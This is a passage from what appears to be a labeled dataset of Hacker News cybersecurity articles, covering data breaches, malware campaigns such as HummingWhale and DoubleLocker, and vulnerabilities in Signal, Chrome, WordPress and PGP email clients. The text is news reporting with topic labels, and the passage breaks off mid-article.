Incidents of massive data breaches, advanced cyber attacks coming from China, groups like Syrian Electronic Army, Hacking Point of Sale machines at retailers such as Target have splashed across the news in the last one year.
Whether a Government Agency or Private Company, Small or a Large Tech Company....
...It's no secret that No one is Immune to Cyber Attacks.
This article is the first in a two-part series from The Hacker News, listing first four out of Top 7 Brutal Cyber Attacks.
And here we go...
#1 ""Hacking Team"" Data Breach
Hacking Team, the controversial spyware company, recently been hacked by some unidentified hackers that exposed over 400 gigabytes of its internal sensitive data on the Internet.
Milan (Italy) based IT firm 'Hacking Team' sells intrusion and surveillance software solutions to Governments and Law Enforcement agencies worldwide.
Hacking Team is infamous for its commercial surveillance tool named as Remote Control System (RCS), which is capable of spying activities and remotely accessing target system's microphone and camera.
However, sometimes even Hackers get Hacked! So same happened with Hacking Team when hackers not only defaced Hacking Team's own Twitter account but also leaked:
Executive Emails
Source codes for Hacking and Spyware Tools
Zero-day exploits, including for Flash, Internet Explorer
Government client list with date of purchase and amount paid
…Marking the attack as one of the biggest cyber attacks on any Company.
One of the aspects of the data breach showed the lack of protection implementations within the organization and using weak passwords.
#2 Ashley Madison Data Breach
TIP: No website can guarantee privacy of your identity, Credit card details, personal photos or any other information. [Read more]
Two months ago, Toronto-based Ashley Madison website, popular as an online Married Dating portal for extramarital affairs with the tagline ""Life is Short. Have an Affair,"" was hacked by 'The Impact Team'.
Hackers allegedly gained access to millions of its customers information database and posted 10GB of personal data for its tens of Millions of customers, including their names and email addresses.
Frequently followed by another leak, where hackers released another 20GB of company's internal data, including personal e-mails from the CEO of Ashley Madison parent company Avid Life, Noel Biderman, along with the source code for its website and mobile apps.
The breach came just two months after an attack on another scandalous site, Adult Friend Finder where again millions of people's very personal data were left exposed on the Internet.
The Ashley Madison and Adult Friend Finder hacking cases raise serious questions about what these dating websites are doing to ensure the security of their users' personal information.
#3 The Sony Pictures Hack
Remember last year when you were able to download and watch unreleased movies of Sony Pictures Entertainment?
Annie, Mr. Turner, Still Alice, To Write Love On Her Arms, and Brad Pitt's ""Fury""...
...were leaked online on torrent websites, following a massive cyber attack on Sony Pictures last year by the Guardians of Peace (GOP) hacking group.
The hack wasn't limited to unreleased movies — the unknown hackers leaked about 200 gigabytes of confidential data belonging to Sony Pictures from movie scripts to sensitive employees data, celebrity's' phone numbers and their travel aliases, making it the most severe hack in the History.
The massive cyber attack on the company was in response to the release of ""The Interview"" — a controversial North Korean-baiting film, where hackers threatened 9/11 Type attack at Theaters showing this movie.
As a result, Sony had to shut down its services for weeks. However, it struggled to solve the issue by pulling ""The Interview"" from theaters and eventually putting it up on Netflix.
But, things have not changed much for Sony. This was the second time Sony was targeted, and the intensity of the attack was such that even after taking the best measures, a subsequent amount of the company's data was leaked to WikiLeaks.
#4 'Fappening' and 'Snappening'
When a surge of Nude Photos of Celebrities were leaked and went viral in August of 2014, the Internet had a meltdown.
Unknown Hacker was able to break into third-party applications connected to services like Facebook, Twitter, Instagram and Apple's iCloud that led to a major incident known as ""The Fappening"".
The Fappening mainly attacked female celebrities and leaked very private photographs of them, including Jennifer Lawrence, Kim Kardashian, Kirsten Dunst, Avril Lavigne and many others.
Within a month of ""The Fappening,"" another similar incident called ""The Snappening"" happened that leaked more than 100,000 nude videos and images of the Snapchat users.
In The Fappening, the Naked Pictures were allegedly retrieved due to a ""brute force"" security flaw in Apple's iCloud file storage service. However, Apple denied it.
In case of The Snappening, Snapchat's servers were not breached. Instead, the nude pictures of users were compromised due to third-party apps used to send and receive Snaps.
However, both the incidents marked as the biggest hacks of one of its kind.
Further Read: Part II — Top 7 Brutal Cyber Attacks Proves that No One is Immune to Hacking.
",Cyber_Attack
TalkTalk Hack: Police Arrest Second Teenager in London,https://thehackernews.com/2015/10/talktalk-hack.html,"British Police have arrested a second teenage boy in relation to the major hack on the servers of UK-based telco 'TalkTalk' last week.
On Monday, a 15-year-old boy (first arrest) from County Antrim, Northern Ireland, was arrested in connection with the TalkTalk Data Breach.
On Thursday, The Metropolitan Police Cyber Crime Unit (MPCCU) arrested this second unnamed 16-year-old boy from Feltham in west London on suspicion of Computer Misuse Act offences.
Latest TalkTalk Data breach put the Bank details and Personally Identifiable Information (PII) of millions of customers at risk, including:
Nearly 21,000 Bank Accounts
Almost 28,000 obscured Credit and Debit card details
Less than 15,000 customer dates of birth
Names, Email Addresses, and Phone Numbers of 1.2 Million Customers
TalkTalk has confessed that ""Not all of the data was encrypted""... yeah, its' too bad.
However, ""Investigations so far show that the information that may have been accessed is not enough on its own to take money from your bank account,"" the company claimed.
""Starting today, we are writing to all customers who have been affected by this to let them know what information has been accessed."", TalkTalk said in a statement.
As advised earlier, the affected TalkTalk customers are highly recommended to change their passwords as soon as possible and keep an eye on their bank accounts over the next few months.
",Data_Breaches
Thousands of High-Risk Vulnerabilities Found in NOAA Satellite System,https://thehackernews.com/2014/09/thousands-of-high-risk-vulnerabilities_9.html,"The informational systems that the National Oceanic and Atmospheric Administration (NOAA) run are loaded with several critical vulnerabilities that could leave it vulnerable to cyber attacks.
According to the findings of an audit recently conducted by the Department of Commerce's Office of the Inspector General (OIG), the Joint Polar Satellite System's (JPSS) ground system is vulnerable to a large number of high-risk vulnerabilities.
The JPSS ground system is used to collect data from several polar-orbiting weather satellites, and distribute the information to users worldwide. This system also provides command, control and data processing for current and future weather satellites.
But, the vulnerabilities identified in the system could impair technology controlling the United States' next generation of polar-orbiting environmental satellites.
""Our analysis of the JPSS program's assessments of system vulnerabilities found that, since FY 2012, the number of high-risk vulnerabilities in the system had increased by two-thirds7 despite recent efforts the program has taken to remediate these vulnerabilities,"" according to a memorandum from Allen Crawley, assistant inspector general for systems acquisition and IT security, to Kathryn Sullivan, under secretary of commerce for oceans and atmosphere and NOAA administrator.
The system is considered to be a ""High Impact"" IT system for which the loss of confidentiality, integrity, or availability could be expected to have a severe or catastrophic effect on organizational operations, organizational assets or individuals.
The audit, which analyzed NOAA's IT security program, showed an unbelievable picture. In the recent audit, the report showed that the number of High-Risk vulnerabilities rose from 14,486 in the first quarter of the fiscal year (FY) 2012 to 23,868 in the second quarter of FY 2014.
""If exploited, these [high-risk] vulnerabilities may make it possible for attackers to significantly disrupt the JPSS mission of providing critical data used in weather forecasting and climate monitoring,"" Crawley wrote in the memorandum.
Some of the vulnerabilities found are difficult to patch, but many of the identified high-risk vulnerabilities can be fixed easily by just making only minor modification to the current system. As more than 9,100 instances of software versions include the following issues:
Out of date software or lacking security patches
Insecurely configured software
Unnecessary user privileges
Moreover, adjustments can be made to more than 3,600 instances of password and auditing settings that are incorrectly configured and do not meet JPSS policy standards, as well as to unnecessary software applications that need to be removed or disabled.
The system even included the ""Heartbleed"" vulnerability, which has since been remediated. Heartbleed is one of the biggest Internet vulnerabilities in recent history that left large number of cryptographic keys and private data such as usernames, passwords, and credit card numbers, from the most important sites and services on the Internet open for hackers.
""In response to our draft memorandum, NOAA concurred with our recommendations,"" Crawley wrote. ""NOAA indicated that it had already implemented [a] recommendation [to use system update processes for quickly applying critical patches], explaining that it remediated the Heartbleed vulnerability during the third quarter of FY 2014.""
The issue is critical because numerous of vulnerabilities within the JPSS software are publicly available from years and , furthermore, tools are also available on the internet that can be used to exploit many of the vulnerabilities.
",Vulnerability
Severe Bug Discovered in Signal Messaging App for Windows and Linux,https://thehackernews.com/2018/05/signal-messenger-vulnerability.html,"Security researchers have discovered a severe vulnerability in the popular end-to-end encrypted Signal messaging app for Windows and Linux desktops which could allow remote attackers to execute malicious code on recipients system just by sending a message—without requiring any user interaction.
Discovered by Alfredo Ortega, a software security consultant from Argentina, the vulnerability was announced on Twitter just a few hours ago with a proof-of-concept video, demonstrating how a javascript payload sent over Signal for desktop app successfully got executed on the recipient's system.
Although technical details of the vulnerability have not been revealed as of now, the issue appears to be a remote code execution vulnerability in Signal or at least something very close to persistent cross-site scripting (XSS) which eventually could allow attackers to inject malicious code onto targeted Windows and Linux systems.
""For the time being, we can only confirm the execution of javascript code. However we are tracking a heap corruption issue, and it's very likely than the javascript execution could lead to native code execution with additional research."" Ortega told The Hacker News.
Ortega also confirms us that the exploitation of this issue requires chaining a couple of vulnerabilities found by two other security researchers from Argentina, Ivan and Juliano.
""I can confirm that this bug did not exist before and was last introduced because the devs forgot why there was a regex there to begin with. I would like to recommend a comment to this comment if it is not repeated again (TBD),"" Ivan said.
At this moment, it is not clear if the primary vulnerability or other chained bugs reside only in the source code of Signal or also in the popular Electron web application framework, the technology on which Signal desktop applications are based.
If the flaw resides in the Electron framework, it might also impact other widely-used desktop applications as well, including Skype, Wordpress, and Slack, which also use the same framework.
Moreover, the infosec community is also worried that if this flaw allows remote attackers to steal their secret encryption keys, it would be the worst nightmare for Signal users.
The good news is that the Open Whisper Systems has already addressed the issue and immediately released new versions of Signal app within a few hours after receiving the responsible vulnerability disclosure by the researcher.
The primary vulnerability that triggers the code execution has been patched in Signal stable release version 1.10.1 and pre-release version 1.11.0-beta.3. So, users are advised to update their Signal for desktop applications as soon as possible.
""At this time we are not sure they all [the vulnerabilities chained together] have been fixed"" Ortega told The Hacker News.
The latest release also patched a recently disclosed vulnerability in Signal for desktop apps which was exposing disappearing messages in a user-readable database of macOS's Notification Center, even if they are deleted from the app.
We will update this article as soon as we get more details of the vulnerability from the researcher. Till then, stay tuned to Facebook and Twitter accounts.
",Cyber_Attack
Google Chrome vulnerability allows Websites to Eavesdrop on You,https://thehackernews.com/2014/04/google-chrome-vulnerability-allows.html,"Just imagine, you are sitting in front of your laptop and your laptop is listening to your nearby conversations. What if the recorded audio from the system's microphone is being instantly uploaded to a malicious website?
Google has created a speech-recognition Application Programming Interface (API) that allows websites to interact with Google Chrome and the computer's microphone allows you to speak instead of typing into any text box, to make hands-free web searches, quick conversions, and audio translator also work with them.
In January, a flaw was discovered in Google Chrome that enabled malicious websites with speech recognition software to eavesdrop on users' conversations from background without their knowledge using an outdated Google speech API.
CHROME IS LISTENING YOU
A new similar vulnerability in Google Chrome has been discovered by Israeli security researcher, Guy Aharonovsky, claimed that the Chrome's speech-recognition API has a vulnerability that allows attackers to turn victim's machine into a listening port without asking for any permission, even if your microphone is completely disabled.
""Even blocking any access to the microphone under chrome://settings/content will not remedy this flaw."" he said in a blog post.
Reported vulnerability exploits the ""-x-webkit-speech"" feature of Chrome's speech-recognition API and allows a malicious web application to eavesdrop in the background without any indication to the user that their microphone is enabled.
He has also published a Proof-of-Concept webpage and a video demonstration, designed to work on Chrome for Mac operating system, but the exploit only works for Chrome for any operating system.
In demonstration, he has used HTML5 full screen feature to the indication box.
""In Chrome all one need in order to access the user's speech is to use this line of HTML5 code: that's all; there will be no fancy confirmation screens. When the user clicks on that little grey microphone he will be recorded. The user will see the 'indication box' telling him to ""Speak now"" but that can be pushed out of the screen and / or obfuscated.""
He has reported the flaw to Google via Chromium bug tracker. They confirmed the existence of the vulnerability, but assigned it 'low' severity level, that means Google will not offer any immediate fix for this flaw.
",Vulnerability
Nasty Android Malware that Infected Millions Returns to Google Play Store,https://thehackernews.com/2017/01/hummingbad-android-malware.html,"HummingBad – an Android-based malware that infected over 10 million Android devices around the world last year and made its gang an estimated US$300,000 per month at its peak – has made a comeback.
Security researchers have discovered a new variant of the HummingBad malware hiding in more than 20 Android apps on Google Play Store.
The infected apps were already downloaded by over 12 Million unsuspecting users before the Google Security team removed them from the Play Store.
Dubbed HummingWhale by researchers at security firm Check Point, the new malware utilizes new, cutting-edge techniques that allow the nasty software to conduct Ad fraud better than ever before and generate revenue for its developers.
The Check Point researchers said the HummingWhale-infected apps had been published under the name of fake Chinese developers on the Play Store with common name structure, com.[name].camera, but with suspicious startup behaviors.
""It registered several events on boot, such as TIME_TICK, SCREEN_OFF and INSTALL_REFERRER which [were] dubious in that context,"" Check Point researchers said in a blog post published Monday.
HummingWhale Runs Malicious Apps in a Virtual Machine
The HummingWhale malware is tricky than HummingBad, as it uses a disguised Android application package (APK) file that acts as a dropper which downloads and runs further apps on the victim's smartphone.
If the victim notices and closes its process, the APK file then drops itself into a virtual machine in an effort to make it harder to detect.
The dropper makes use of an Android plugin created by the popular Chinese security vendor Qihoo 360 to upload malicious apps to the virtual machine, allowing HummingWhale to further install other apps without having to elevate permissions, and disguises its malicious activity to get onto Google Play.
""This .apk operates as a dropper, used to download and execute additional apps, similar to the tactics employed by previous versions of HummingBad,"" researchers said. ""However, this dropper went much further. It uses an Android plugin called DroidPlugin, originally developed by Qihoo 360, to upload fraudulent apps on a virtual machine.""
HummingWhale Runs Without having to Root the Android Device
Thanks to the virtual machine (VM), the HummingWhale malware no longer needs to root Android devices unlike HummingBad and can install any number of malicious or fraudulent apps on the victim's devices without overloading their smartphones.
Once the victim gets infected, the command and control (C&C) server send fake ads and malicious apps to the user, which runs in a VM, generating a fake referrer ID used to spoof unique users for ad fraud purposes and generate revenue.
Alike the original HummingBad, the purpose of HummingWhale is to make lots of money through ad fraud and fake app installations.
Besides all these malicious capabilities, the HummingWhale malware also tries to raise its reputation on Google Play Store using fraudulent ratings and comments, the tactic similar to the one utilized by the Gooligan malware.
",Malware
Slack Resets Passwords For Users Who Hadn't Changed It Since 2015 Breach,https://thehackernews.com/2019/07/slack-password-data-breach.html,"If you use Slack, a popular cloud-based team collaboration server, and recently received an email from the company about a security incident, don't panic and read this article before taking any action.
Slack has been sending a ""password reset"" notification email to all those users who had not yet changed passwords for their Slack accounts since 2015 when the company suffered a massive data breach.
For those unaware, in 2015, hackers unauthorisedly gained access to one of the company's databases that stored user profile information, including their usernames, email addresses, and hashed passwords.
At that time, attackers also secretly inserted code, probably on the login page, which allowed them to capture plaintext passwords entered by some Slack users during that time.
However, immediately following the security incident, the company automatically reset passwords for those small number of Slack users whose plaintext passwords were exposed, but asked other affected users to change their passwords manually.
Keep calm and change your password 😊
Slack is resetting the passwords for all those users (approximately 1% of total) who hadn't changed their passwords since 2015 when the company experienced a #databreach leaking users' credentialshttps://t.co/k6jSBgloAX
Check this thread: https://t.co/Fo7QbI9pOv
— The Hacker News (@TheHackersNews) July 18, 2019
Now in its latest statement released today, the company said they learned about a new list of username and password combinations that match with the login credentials of its users who did not change their password after the 2015 data breach.
""We were recently contacted through our bug bounty program with information about potentially compromised Slack credentials,"" Slack states.
""We immediately confirmed that a portion of the email addresses and password combinations were valid, reset those passwords, and explained our actions to the affected users.""
The latest security incident only affects users, who:
created an account before March 2015,
have not changed their password since the incident, and
accounts that do not require logging in via a single-sign-on (SSO) provider.
The company is not exactly aware of the source of this new leaked plaintext credentials, but suggests it could be the ""result of malware attack or password reuse between services.""
It is also possible that someone might have successfully cracked hashed passwords that were leaked in the 2015 data breach, even when it was protected using the bcrypt algorithm with a randomly generated salt per-password.
Late last month, Slack also sent a separate notification to all the affected users informing them about the potential compromise of their credentials without providing any details of the incident, but it seems many users ignored the warning and did not change their passwords voluntarily.
Therefore, now Slack has automatically reset passwords on affected accounts, that are about 1% of the total registered users, that haven't been updated since 2015 as a precautionary measure, asking them to set a new password using this guide.
""We have no reason to believe that any of these accounts were compromised, but we believe that this precaution is worth any inconvenience the reset may cause,"" the company said.
Besides your changing password, you are also recommended to enable two-factor authentication for your Slack accounts, even if you are not affected.
Slack is still investigating the latest security incident and promises to share more information as soon as they are available.
",Cyber_Attack
Thousands of WordPress Sites Hacked Using Recently Disclosed Vulnerability,https://thehackernews.com/2017/02/wordpress-hack-seo.html,"Last week, we reported about a critical zero-day flaw in WordPress that was silently patched by the company before hackers have had their hands on the nasty bug to exploit millions of WordPress websites.
To ensure the security of millions of websites and its users, WordPress delayed the vulnerability disclosure for over a week and worked closely with security companies and hosts to install the patch, ensuring that the issue was dealt with in short order before it became public.
But even after the company's effort to protect its customers, thousands of admins did not bother to update their websites, which are still vulnerable to the critical bug and has already been exploited by hackers.
While WordPress includes a default feature that automatically updates unpatched websites, some admins running critical services disable this feature for first testing and then applying patches.
Even the news blog of one of the famous Linux distribution OpenSUSE (news.opensuse.org) was also hacked, but restored immediately without breach of any other part of openSUSE's infrastructure, CIO reports.
The vulnerability resided in Wordpress REST API that would lead to the creation of new flaws, allowing an unauthenticated attacker to delete pages or modify all pages on unpatched websites and redirect their visitors to malicious exploits and a large number of attacks.
The security researcher at Sucuri, who privately disclosed the flaw to WordPress, said they started noticing the attacks leveraging this bug less than 48 hours after disclosure. They noticed at least four different campaigns targeting still unpatched websites.
In one such campaign, hackers were successful in replacing the content of over 66,000 web pages with ""Hacked by"" messages. Rest campaigns have targeted roughly 1000 pages in total.
Besides defacing websites, such attacks appear to be carried out mostly for black hat SEO campaign in order to spread spam and gain ranking in search engine, which is also known as search engine poisoning.
""What we expect to see is a lot more SEO spam (Search Engine Poisoning) attempts moving forward,"" explained Daniel Cid, CTO, and founder of Sucuri.
""There's already a few exploit attempts that try to add spam images and content to a post. Due to the monetization possibilities, this will likely be the #1 route to abuse this vulnerability.""
So, site administrators who have not yet updated their websites to the latest WordPress release 4.7.2 are urged to patch them immediately before becoming next target of SEO spammers and hackers.
",Cyber_Attack
Experts Unveil Cyber Espionage Attacks by CopyKittens Hackers,https://thehackernews.com/2017/07/opykittens-cyber-espionage.html,"Security researchers have discovered a new, massive cyber espionage campaign that mainly targets people working in government, defence and academic organisations in various countries.
The campaign is being conducted by an Iran-linked threat group, whose activities, attack methods, and targets have been released in a joint, detailed report published by researchers at Trend Micro and Israeli firm ClearSky.
Dubbed by researchers CopyKittens (aka Rocket Kittens), the cyber espionage group has been active since at least 2013 and has targeted organisations and individuals, including diplomats and researchers, in Israel, Saudi Arabia, Turkey, the United States, Jordan and Germany.
The targeted organisations include government institutions like Ministry of Foreign Affairs, defence companies, large IT companies, academic institutions, subcontractors of the Ministry of Defense, and municipal authorities, along with employees of the United Nations.
The latest report [PDF], dubbed ""Operation Wilted Tulip,"" details an active espionage campaign conducted by the CopyKittens hackers, a vast range of tools and tactics they used, its command and control infrastructure, and the group's modus operandi.
How CopyKittens Infects Its Targets
The group used different tactics to infiltrate their targets, which includes watering hole attacks — wherein JavaScript code is inserted into compromised websites to distribute malicious exploits.
The news media and organisations whose websites were abused as watering hole attacks include The Jerusalem Post, for which even German Federal Office for Information Security (BSI) issued an alert, Maariv news and IDF Disabled Veterans Organization.
Besides water hole attacks, CopyKittens also used other methods to deliver malware, including:
Emailed links to malicious websites controlled by attackers.
Weaponized Office documents exploiting recently discovered flaw (CVE-2017-0199).
Web servers exploitation using vulnerability scanner and SQLi tools like Havij, sqlmap, and Acunetix.
Fake social media entities to build trust with targets and potentially spread malicious links.
""The group uses a combination of these methods to persistently target the same victim over multiple platforms until they succeed in establishing an initial beachhead of infection – before pivoting to higher value targets on the network,"" Trend Micro writes in a blog post.
In order to infect its targets, CopyKittens makes use of its own custom malware tools in combination with existing, commercial tools, like Red Team software Cobalt Strike, Metasploit, post-exploitation agent Empire, TDTESS backdoor, and credential dumping tool Mimikatz.
Dubbed Matryoshka, the remote access trojan is the group's self-developed malware which uses DNS for command and control (C&C) communication and has the ability to steal passwords, capture screenshots, record keystrokes, collect and upload files, and give the attackers Meterpreter shell access.
""Matryoshka is spread through spear phishing with a document attached to it. The document has either a malicious macro that the victim is asked to enable or an embedded executable the victim is asked to open,"" Clear Sky says in a blog post.
The initial version of the malware was analysed in 2015 and seen in the wild from July 2016 until January 2017, though the group also developed and used Matryoshka version 2.
Users are recommended to enable two-factor authentication in order to protect their webmail accounts from being compromised, which is a treasure trove of information for hackers, and an ""extremely strong initial beachhead"" for pivoting into other targets.
",Cyber_Attack
"Millions of DSL modems hacked in Brazil, spread banking malware",https://thehackernews.com/2012/10/millions-of-dsl-modems-hacked-in-brazil.html,"More than 4.5 million DSL modems have been compromised as part of a sustained hacking campaign in Brazil, with the devices spreading malware and malicious web address redirects.
According to the malware analyst at Kaspersky Lab in Brazil, Fabio Assolini. The vulnerability exploited by attackers allowed the use of a script to steal passwords and remotely access the configuration of modems. The attacks was described as ""One firmware vulnerability, two malicious scripts, three hardware manufacturers, 35 malicious DNS servers, thousands of compromised ADSL modems, millions of victims.""
According to Kaspersky, the Brazilian attackers sought to steal users' banking credentials by redirecting users to false versions of popular sites like Facebook or Google and prompting them to install malware. Some 40 DNS servers were set up outside Brazil too in order to serve forged requests for domain names belonging to Brazilian banks.
Nakedsecurity writes,-- The first thing users may have noticed is that they would visit legitimate websites such as Google, Facebook and Orkut (a Google social network which is particularly popular in Brazil) and would be prompted to install software. In the example below, visitors to Google.com.br were invited to install a program called ""Google Defence"" in order to access the ""new Google"".
It remains unclear which modem manufacturers and models are susceptible to the attacks. Assolini said a vulnerability disclosed in early 2011 appears to be caused by a chipset driver included with modems that use hardware from communications chip provider Broadcom. It allows a CSRF attack to take control of the administration panel and capture the password set on vulnerable devices.
After manufacturers issued firmware updates to plug the security hole, the number of compromised modems reduced. However, some 300,000 modems are still thought to be controlled by attackers.
",Malware
Yahoo Mail hacked; Change your account password immediately,https://thehackernews.com/2014/01/yahoo-mail-hacked-change-your-account.html,"A really bad year for the world's second-largest email service provider, Yahoo Mail! The company announced today, 'we identified a coordinated effort to gain unauthorized access to Yahoo Mail accounts', user names and passwords of its email customers have been stolen and are used to access multiple accounts.
Yahoo did not say how many accounts have been affected, and neither they are sure about the source of the leaked users' credentials. It appears to have come from a third party database being compromised, and not an infiltration of Yahoo's own servers.
""We have no evidence that they were obtained directly from Yahoo's systems. Our ongoing investigation shows that malicious computer software used the list of usernames and passwords to access Yahoo Mail accounts. The information sought in the attack seems to be names and email addresses from the affected accounts' most recent sent emails.""
For now, Yahoo is taking proactive actions to protect their affected users, ""We are resetting passwords on impacted accounts and we are using second sign-in verification to allow users to re-secure their accounts. Impacted users will be prompted (if not, already) to change their password and may receive an email notification or an SMS text if they have added a mobile number to their account.""
People frequently use the same passwords on multiple accounts, so possibly hackers are brute-forcing Yahoo accounts with the user credentials stolen from other data breaches.
Yahoo users can prevent account hijacks by using a strong and unique password. You can use 'Random strong password generator' feature of DuckDuckGo search engine to get a unique & strong password.
Users are also recommended to enable two-factor authentication, which requires a code texted to the legitimate user's mobile phone whenever a login attempt is made from a new computer.
Yahoo! was hacked in July 2012, with attackers stealing 450,000 email addresses and passwords from a Yahoo! contributor network.
Readers can also download two free Whitepaper related to the Email and account security:
Cloud-Based Email Archiving
Email Data Loss Prevention
Well, Yahoo is now working with federal law enforcement as a part of its investigation.
",Data_Breaches
Cyber jihadists could use Stuxnet worm to attack the west !,https://thehackernews.com/2011/04/cyber-jihadists-could-use-stuxnet-worm.html,"Cyber jihadists could use Stuxnet worm to attack the west !
ACCORDING TO Mikko Hypponen, F-Secure's chief security researcher, there has been a revolution in malware with Stuxnet. ""The worst case scenario is that Al-Qaeda or another organisation could gain access to this type of knowledge and information, and make use of it to launch attacks on critical infrastructure – like blow up nuclear power plants or do something to our food chain.""
",Malware
New Ransomware Not Just Encrypts Your Android But Also Changes PIN Lock,https://thehackernews.com/2017/10/android-ransomware-pin.html,"DoubleLocker—as the name suggests, it locks device twice.
Security researchers from Slovakia-based security software maker ESET have discovered a new Android ransomware that not just encrypts users' data, but also locks them out of their devices by changing lock screen PIN.
On top of that:
DoubleLocker is the first-ever ransomware to misuse Android accessibility—a feature that provides users alternative ways to interact with their smartphone devices, and mainly misused by Android banking Trojans to steal banking credentials.
""Given its banking malware roots, DoubleLocker may well be turned into what could be called ransom-bankers,"" said Lukáš Štefanko, the malware researcher at ESET.
""Two-stage malware that first tries to wipe your bank or PayPal account and subsequently locks your device and data to request a ransom.""
Researchers believe DoubleLocker ransomware could be upgraded in future to steal banking credentials as well, other than just extorting money as ransom.
First spotted in May this year, DoubleLocker Android ransomware is spreading as a fake Adobe Flash update via compromised websites.
Here's How the DoubleLocker Ransomware Works:
Once installed, the malware requests user for the activation of 'Google Play Services' accessibility feature, as shown in the demonstration video.
After obtaining this accessibility permission, the malware abuses it to gain device's administrator rights and sets itself as a default home application (the launcher)—all without the user's knowledge.
""Setting itself as a default home app – a launcher – is a trick that improves the malware's persistence,"" explains Štefanko.
""Whenever the user clicks on the home button, the ransomware gets activated, and the device gets locked again. Thanks to using the accessibility service, the user does not know that they launch malware by hitting Home.""
Once executed, DoubleLocker first changes the device PIN to a random value that neither attacker knows nor stored anywhere and meanwhile the malware encrypts all the files using AES encryption algorithm.
DoubleLocker ransomware demands 0.0130 BTC (approximately USD 74.38 at time of writing) and threatens victims to pay the ransom within 24 hours.
If the ransom is paid, the attacker provides the decryption key to unlock the files and remotely resets the PIN to unlock the victim's device.
How to Protect Yourself From DoubleLocker Ransomware
According to the researchers, so far there is no way to unlock encrypted files, though, for non-rooted devices, users can factory-reset their phone to unlock the phone and get rid of the DoubleLocker ransomware.
However, for rooted Android devices with debugging mode enabled, victims can use Android Debug Bridge (ADB) tool to reset PIN without formatting their phones.
The best way to protect yourself from avoiding falling victims to such ransomware attacks is to always download apps from trusted sources, like Google play Store, and stick to verified developers.
Also, never click on links provided in SMS or emails. Even if the email looks legit, go directly to the website of origin and verify any possible updates.
Moreover, most importantly, keep a good antivirus app on your smartphone that can detect and block such malware before it can infect your device, and always keep it and other apps up-to-date.
",Malware
Former NSA software developer can Hack Surveillance cameras remotely,https://thehackernews.com/2013/06/former-nsa-software-developer-can-hack.html,"A former NSA software developer is saying he has identified how major camera systems used by industrial plants, prisons, banks and the military could be hacked to freeze a frame and would allow hackers to spy on facilities or gain access to sensitive computer networks.
Craig Heffner, that there were zero day vulnerabilities in digital video surveillance equipment from firms, including Cisco Systems, D-Link and TRENDnet. He has discovered hundreds of thousands of surveillance cameras that can be accessed via the public Internet.
""Somebody could potentially access a camera and view it. Or they could also use it as a pivot point, an initial foothold, to get into the network and start attacking internal systems."" Heffner said.
Wrost thing, probably NSA is also aware of these vulnerabilities. They could use it as a pivot point, an initial foothold, to get into the network and start attacking internal systems.
He said he doesn't plan on revealing the vulnerabilities to the companies ahead of the conference, but all the companies have expressed that they'll stay tuned to make any necessary fixes.
He plans to demonstrate techniques for exploiting these bugs at the Hacking conference, in July. He can freeze a picture on a surveillance camera to help thieves break into facilities without detection.
",Vulnerability
Hackers Exploit SonicWall Zero-Day Bug in FiveHands Ransomware Attacks,https://thehackernews.com/2021/04/hackers-exploit-sonicwall-zero-day-bug.html,"An ""aggressive"" financially motivated threat group tapped into a zero-day flaw in SonicWall VPN appliances prior to it being patched by the company to deploy a new strain of ransomware called FIVEHANDS.
The group, tracked by cybersecurity firm Mandiant as UNC2447, took advantage of an ""improper SQL command neutralization"" flaw in the SSL-VPN SMA100 product (CVE-2021-20016, CVSS score 9.8) that allows an unauthenticated attacker to achieve remote code execution.
""UNC2447 monetizes intrusions by extorting their victims first with FIVEHANDS ransomware followed by aggressively applying pressure through threats of media attention and offering victim data for sale on hacker forums,"" Mandiant researchers said. ""UNC2447 has been observed targeting organizations in Europe and North America and has consistently displayed advanced capabilities to evade detection and minimize post-intrusion forensics.""
CVE-2021-20016 is the same zero-day that the San Jose-based firm said was exploited by ""sophisticated threat actors"" to stage a ""coordinated attack on its internal systems"" earlier this year. On January 22, The Hacker News exclusively revealed that SonicWall had been breached by exploiting ""probable zero-day vulnerabilities"" in its SMA 100 series remote access devices.
Successful exploitation of the flaw would grant an attacker the ability to access login credentials as well as session information that could then be used to log into a vulnerable unpatched SMA 100 series appliance.
According to the FireEye-owned subsidiary, the intrusions are said to have occurred in January and February 2021, with the threat actor using a malware called SombRAT to deploy the FIVEHANDS ransomware. It's worth noting that SombRAT was discovered in November 2020 by BlackBerry researchers in conjunction with a campaign called CostaRicto undertaken by a mercenary hacker group.
UNC2447 attacks involving ransomware infections were first observed in the wild in October 2020, initially compromising targets with HelloKitty ransomware, before swapping it for FIVEHANDS in January 2021. Incidentally, both the ransomware strains, written in C++, are rewrites of another ransomware called DeathRansom.
""Based on technical and temporal observations of HelloKitty and FIVEHANDS deployments, HelloKitty may have been used by an overall affiliate program from May 2020 through December 2020, and FIVEHANDS since approximately January 2021,"" the researchers said.
FIVEHANDS also differs from DeathRansom and HelloKitty in the use of a memory-only dropper and additional features that allow it to accept command-line arguments and utilize Windows Restart Manager to close a file currently in use prior to encryption.
The disclosure comes less than two weeks after FireEye divulged three previously unknown vulnerabilities in SonicWall's email security software that were actively exploited to deploy a web shell for backdoor access to the victim. FireEye is tracking this malicious activity under the moniker UNC2682.
",Malware
Here's How eFail Attack Works Against PGP and S/MIME Encrypted Emails,https://thehackernews.com/2018/05/efail-pgp-email-encryption.html,"With a heavy heart, security researchers have early released the details of a set of vulnerabilities discovered in email clients for two widely used email encryption standards—PGP and S/MIME—after someone leaked their paper on the Internet, which was actually scheduled for tomorrow.
PGP and S/MIME are popular end-to-end encryption standards used to encrypt emails in a way that no one, not even the company, government, or cyber criminals, can spy on your communication.
Before explaining how the vulnerability works, it should be noted that the flaw doesn't reside in the email encryption standards itself; instead, it affects a few email clients/plugins that incorrectly implemented the technologies.
Dubbed eFail by the researchers, the vulnerabilities, as described in our previous early-warning article, could allow potential attackers to decrypt the content of your end-to-end encrypted emails in plaintext, even for messages sent in the past.
According to the paper released by a team of European security researchers, the vulnerabilities exist in the way encrypted email clients handle HTML emails and external resources, like loading of images, styles from external URLs.
Here's How the eFail Attack Works:
Email clients are usually configured to automatically decrypt the content of encrypted emails you receive, but if your client is also configured to load external resources automatically, attackers can abuse this behavior to steal messages in plaintext just by sending you a modified version of the same encrypted email content.
The attack vector requires injected plaintext into the encrypted mail, and then using the exploit, it will exfiltrate the originally encrypted data as soon as any recipient's mail client accesses (or decrypts) the message
It should be noted that to perform an eFail attack, an attacker must have access to your encrypted emails, which is then modified in the following way and send back to you in order to trick your email client into revealing the secret message to the remote attacker without alerting you.
As described in the proof-of-concept attack released by the researchers, the attacker uses one of the encrypted messages you are supposed to receive or might have already received and then turns it into a multipart HTML email message, as well as forges the return address, so it appears to come from the original sender.
